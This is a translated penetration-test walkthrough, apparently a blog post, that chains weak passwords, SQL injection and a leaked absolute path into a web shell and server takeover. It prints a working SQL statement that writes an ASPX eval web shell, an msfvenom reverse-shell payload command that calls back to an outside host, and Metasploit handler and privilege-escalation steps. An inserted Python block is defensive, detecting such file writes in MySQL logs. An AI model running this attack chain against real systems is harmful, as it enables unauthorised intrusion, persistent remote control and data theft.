
Title: Vulnerability combination takes shell

0x00 Introduction

During a penetration testing project, the customer provided only a single IP. As a rookie, I set off on a long voyage.

0x01 Information Collection

Scan the ports with Nmap, and pay attention to the high-numbered ports; they often yield unexpected gains.

Try logging in with weak passwords.

A brief summary.

0x03 Vulnerability Detection

After logging into the back-end systems for testing, I found that SQL injection exists in both of them.

An arbitrary file download vulnerability was also found in the crocus system on port 8000.

It turned out to be a log download. Clicking it revealed an absolute path in the page.

OK! Collect the absolute path.

The current idea is:

Given the absolute path, combine it with the SQL injection and use sqlmap's --sql-shell to try to write a Trojan (web shell).

0x04 Vulnerability

Take a closer look at this absolute path. I heard that staring at it has miraculous effects. (laugh)

I think I have seen WCMS4.0 somewhere.

That's right, it's the system on port 12055. Log in to the back end.

The SQL injection in the back end can be used to write a shell.

The SQL injection point is roughly at the search function.

Intercept the request, save it as post.txt, and start the injection with sqlmap.

Injection, DBA privileges and the absolute path are all present, so everything needed to write a shell in one step is in place.

0x05 Webshell

Start writing the ASPX Trojan (web shell):

select '<%@ Page Language="Javascript"%><%eval(Request.Item["pass"]);%>' INTO OUTFILE 'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx'
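As an added example from the defender's side (not code from the original post), the Python below scans MySQL general-query-log lines for INTO OUTFILE / INTO DUMPFILE writes that target web-executable files or leave the allowed export directory, which is exactly the kind of write shown above, and checks whether the secure_file_priv setting would have blocked it. The log lines and the allowed directory are constructed for the example.

```python
import re

# Constructed sample lines in MySQL general-query-log format (not from the post).
SAMPLE_LOG = """\
2019-03-01T10:00:01.000000Z\t 12 Query\tSELECT id, title FROM news WHERE title LIKE '%test%'
2019-03-01T10:00:02.000000Z\t 12 Query\tSELECT 'placeholder' INTO OUTFILE 'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx'
2019-03-01T10:00:03.000000Z\t 13 Query\tSELECT * FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'
2019-03-01T10:00:04.000000Z\t 13 Query\tSELECT * FROM orders INTO OUTFILE '/tmp/export.txt'
2019-03-01T10:00:05.000000Z\t 14 Query\tSELECT 'placeholder' INTO DUMPFILE '/var/www/html/uploads/cmd.php'
"""

# Extensions the web server would execute if a file with them landed in the webroot.
WEB_EXTENSIONS = {".aspx", ".asp", ".ashx", ".php", ".jsp", ".jspx"}
# Directories a DBA legitimately exports to (assumed for the example); anything else is suspicious.
ALLOWED_EXPORT_DIRS = ("/var/lib/mysql-files/",)

FILE_WRITE_RE = re.compile(
    r"INTO\s+(OUTFILE|DUMPFILE)\s+'((?:[^'\\]|\\.)*)'", re.IGNORECASE)
QUERY_RE = re.compile(r"^(\S+)\t\s*(\d+) Query\t(.*)$")


def classify_statement(sql):
    """Return (kind, path, reason) for a suspicious file-writing statement, else None."""
    m = FILE_WRITE_RE.search(sql)
    if not m:
        return None
    kind, path = m.group(1).upper(), m.group(2)
    norm = path.replace("\\", "/").lower()
    filename = norm.rsplit("/", 1)[-1]
    ext = "." + filename.rsplit(".", 1)[-1] if "." in filename else ""
    if ext in WEB_EXTENSIONS:
        return (kind, path, "web-executable extension")
    if not norm.startswith(ALLOWED_EXPORT_DIRS):
        return (kind, path, "outside allowed export directory")
    return None


def scan_general_log(text):
    """Return a list of (timestamp, thread_id, kind, path, reason) for suspicious writes."""
    findings = []
    for line in text.splitlines():
        m = QUERY_RE.match(line)
        if not m:
            continue
        ts, tid, sql = m.groups()
        hit = classify_statement(sql)
        if hit:
            findings.append((ts, int(tid), *hit))
    return findings


def secure_file_priv_ok(value):
    """NULL (None) disables file export entirely and a directory confines it; '' allows writes anywhere."""
    return value is None or value.strip() != ""
```

With the default of an empty secure_file_priv the statement above succeeds as soon as the account holds the FILE privilege, so both the setting and the FILE grant are worth auditing alongside the log.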

No problem; visit it.

Nice!

Connect with the "kitchen knife" web shell client (China Chopper).

0x06 Controlling the server

First, collect information about this server.

The server sits on an internal network, so here a Metasploit payload (the "msf horse") is used to bounce a reverse shell out and forward it.

For how to set up Metasploit on an external (public) server, a recommended article:

http://www.sqlsec.com/2018/03/cloud.html#more

Generate the Metasploit payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=2333 -f exe -o road.exe

xx.xx.xx.xx is the public server's IP address.

2333 is the port on the public server.

Upload the generated payload to the compromised host (the "broiler") through China Chopper.

Configure the listener in Metasploit on the external server:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 127.0.0.1

run

Run a few simple meterpreter commands:

getuid (show the current privileges)

getsystem (attempt privilege escalation)

run getgui -u
